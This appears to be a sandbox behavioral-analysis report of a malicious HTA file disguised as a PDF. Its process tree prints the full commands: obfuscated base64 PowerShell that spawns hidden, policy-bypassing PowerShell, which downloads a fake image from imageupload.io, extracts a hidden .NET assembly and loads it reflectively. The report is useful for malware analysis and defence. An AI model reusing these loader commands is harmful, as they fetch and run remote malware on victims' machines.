
Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\XLARFQ77802578790.pdf.hta.html

    904
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:904 CREDAT:145409

      2264
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw
€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

        1968
        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

          2216
